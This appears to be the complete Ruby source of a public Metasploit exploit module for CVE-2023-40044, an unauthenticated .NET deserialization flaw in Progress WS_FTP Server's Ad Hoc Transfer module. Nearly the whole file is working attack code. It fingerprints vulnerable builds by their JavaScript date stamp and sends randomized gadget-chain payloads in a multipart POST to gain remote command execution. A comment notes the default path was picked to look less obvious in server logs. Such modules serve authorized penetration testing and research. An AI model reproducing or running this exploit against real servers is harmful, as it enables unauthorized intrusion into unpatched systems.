Progress Software WS_FTP Unauthenticated Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server          prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability          was originally discovered by AssetNote.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-40044'],          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],          ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],          ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044']        ],        'DisclosureDate' => '2023-09-27',        'Platform' => %w[win],        'Arch' => [ARCH_CMD],        # 5000 will allow the powershell payloads to work as they require ~4200 bytes. Notably, the ClaimsPrincipal and        # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g.        # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume        # all the available payload space via ./modules/nops/cmd/generic.rb).        'Payload' => { 'Space' => 5000 },        'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`.        'Targets' => [          [            'Windows', {}          ]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in        # the IIS logs as to what the request is for, however the user can change this as needed if required.        Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']),      ]    )  end  def check    # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.    res = send_request_cgi(      'method' => 'GET',      'uri' => '/AHT/AHT_UI/public/index.html'    )    return CheckCode::Unknown('Connection failed') unless res    title = Nokogiri::HTML(res.body).xpath('//head/title')&.text    # We verify the target is running the AHT module, by inspecting the HTML heads title.    if title == 'Ad Hoc Transfer'      res = send_request_cgi(        'method' => 'GET',        'uri' => '/AHT/AHT_UI/public/js/app.min.js'      )      return CheckCode::Unknown('Connection failed') unless res      # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file      # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,      # but if it was build on Sept 2023 or after, it is not vulnerable.      if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}        day = ::Regexp.last_match(1).to_i        month = ::Regexp.last_match(2).to_i        year = ::Regexp.last_match(3).to_i        description = "Detected a build date of #{day}-#{month}-#{year}"        if year > 2023 || (year == 2023 && month >= 9)          return CheckCode::Safe(description)        end        return CheckCode::Appears(description)      end      # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.      return CheckCode::Detected    end    CheckCode::Unknown  end  def exploit    unless datastore['TARGET_URI'].start_with? '/AHT/'      fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')    end    # All of these gadget chains will work. We pick a random one during exploitation.    chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties]    gadget = ::Msf::Util::DotNetDeserialization.generate(      payload.encoded,      gadget_chain: chains.sample,      formatter: :BinaryFormatter    )    # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.    tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]    message = Rex::MIME::Message.new    part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)    part.header.set('name', rand_text_alphanumeric(8))    res = send_request_cgi(      {        'uri' => normalize_uri(datastore['TARGET_URI']),        'ctype' => 'multipart/form-data; boundary=' + message.bound,        'method' => 'POST',        'data' => message.to_s      }    )    unless res&.code == 302      fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability')    end  endend